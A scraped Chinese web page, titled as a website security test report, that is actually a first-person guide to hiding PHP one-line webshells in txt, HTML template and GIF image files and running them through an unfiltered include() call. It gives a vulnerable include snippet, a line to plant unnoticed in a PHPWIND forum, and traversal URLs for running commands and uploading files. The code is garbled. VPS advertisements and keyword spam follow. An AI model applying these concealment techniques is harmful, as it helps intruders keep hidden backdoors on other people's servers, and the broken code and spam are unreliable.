文件网站安全测试报告

网站安全测试  时间:2021-02-14  阅读:()

网站安全测试报告

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里其实把一句话木马插入到PHP文件中就已经很隐蔽了如果说硬是要放到HTML文件或图片里就接着往下看这篇的篇测试报告吧。要知道如果光把P HP语句放到图片里是无论如何也不能执行的 因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 include、 require等。

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。 ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。 由于URL里用GET方式很难传递参数这就使得插入木马的性能得不到发挥。

Include函数在PHP中使用的比较频繁所以引起的安全问题也实在太多例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。 由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句

‘’?@includeinclud/.$PHPWIND_ROOT;?一般管理员是无法看出来的。

有了include函数来辅助帮忙我们就可以把PH P木马隐藏到诸如txt、 html和图片文件等很多类型的文件里来了。 因为txt、 html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了下面我们就依次来做测试。

首先建立一PHP文件test.php文件内容为:

$test=$_GET[''' 'test'' ' '];

@include' ' ''test/' ''' .$test;

?

Txt文件一般都是说明文件所以我们把一句话木马放到目录的说明文件里就O K了。随便建立一个TX T文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问

//localhost/test/test.php?test=. ./t.txt如果你看到t.txt的内容就证明Ok了然后把在lanker微型PHP后门客户端木马地址添入//localhost/test/test.php?test=. ./t.txt密码里添入cmd就可以了执行返回的结果都可以看到。

对于HTML的文件一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来我们可以在HTML里加入一个隐藏属性的文本框如然后使用方法同上。执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容为我可以得到目录为C:\Uniserver2_7s\www\test。

下面我们说说图片文件要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑把插入到图片末尾

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

我们查看P HP环境变量返回的是结果是原图片。

这里可能要和我们想象的结果有些差距了其实命令已经运行了只是返回的结果看不到而已 因为这是真正的GIF文件所以是不会显示返回结果的 为了证明是否真的执行了命令我们执行上传文件命令。果不出所料文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果那就拿出记事本伪造一个假的图片文件吧。

到这里就基本测试完了 怎样隐蔽PHP后门就看你自己的选择了。行文仓促如有不妥之处请指出!

imidc:$88/月,e3-1230/16G内存/512gSSD/30M直连带宽/13个IPv4日本多IP

imidc对日本独立服务器在搞特别促销,原价159美元的机器现在只需要88美元,而且给13个独立IPv4,30Mbps直连带宽,不限制流量。注意,本次促销只有一个链接,有2个不同的优惠码,你用不同的优惠码就对应着不同的配置,价格也不一样。88美元的机器,下单后默认不管就给512G SSD,要指定用HDD那就发工单,如果需要多加一个/28(13个)IPv4,每个月32美元...官方网站:https:...

享有云:美国BGP云服务器低至20元/月起,首月打折;香港2核2G2M仅50元/月起

享有云怎么样?享有云是一家新的国内云服务器商家,目前提供国内、香港及海外地区的云服务器,拥有多线路如:BGP线路、CN2线路、高防等云服务器,并且提供稳定、安全、弹性、高性能的云端计算服务,实时满足您的多样性业务需求。目前,美国bgp云服务器,5M带宽,低至20元/月起,270元/年起,首月打折;香港2核2G2M仅50元/月起,450元/年起!点击进入:享有云官方网站地址享有云优惠活动:一、美国B...

Vultr再次发布充值多少送多少活动

昨天我们很多小伙伴们应该都有看到,包括有隔壁的一些博主们都有发布Vultr商家新的新用户注册福利活动。以前是有赠送100美元有效期30天的,这次改成有效期14天。早年才开始的时候有效期是60天的,这个是商家行为,主要还是吸引到我们后续的充值使用,毕竟他们的体验金赠送,在同类商家中算是比较大方的。昨天活动内容:重新调整Vultr新注册用户赠送100美元奖励金有效期14天今天早上群里的朋友告诉我,两年...

网站安全测试为你推荐
外网和内网什么是内网,和外网有什么区别刷网站权重如何刷流量才能提高网站权重站长故事部队里什么是站长?最低是什么级别?都有哪些级别啊?打开网页出现错误我打开网页老出现错误是怎么了?打开网页出现错误网页出现错误怎么解决?要最简单的那种打开网页出现错误网页上有错误怎么解决?eset最新用户名密码ESET4.0最新用户名和密码bluestacksbluestacks怎么用arm开发板想购买一个ARM开发板,选什么类型的好中小企业信息化信息化为中小企业发展带来了哪些机遇
新秒杀 hkbn ix主机 42u标准机柜尺寸 unsplash 主机屋免费空间 国外php空间 web服务器架设软件 魔兽世界台湾服务器 大容量存储器 vip购优汇 河南m值兑换 域名评估 nerds 如何用qq邮箱发邮件 ca187 便宜空间 smtp服务器地址 国外的代理服务器 photobucket 更多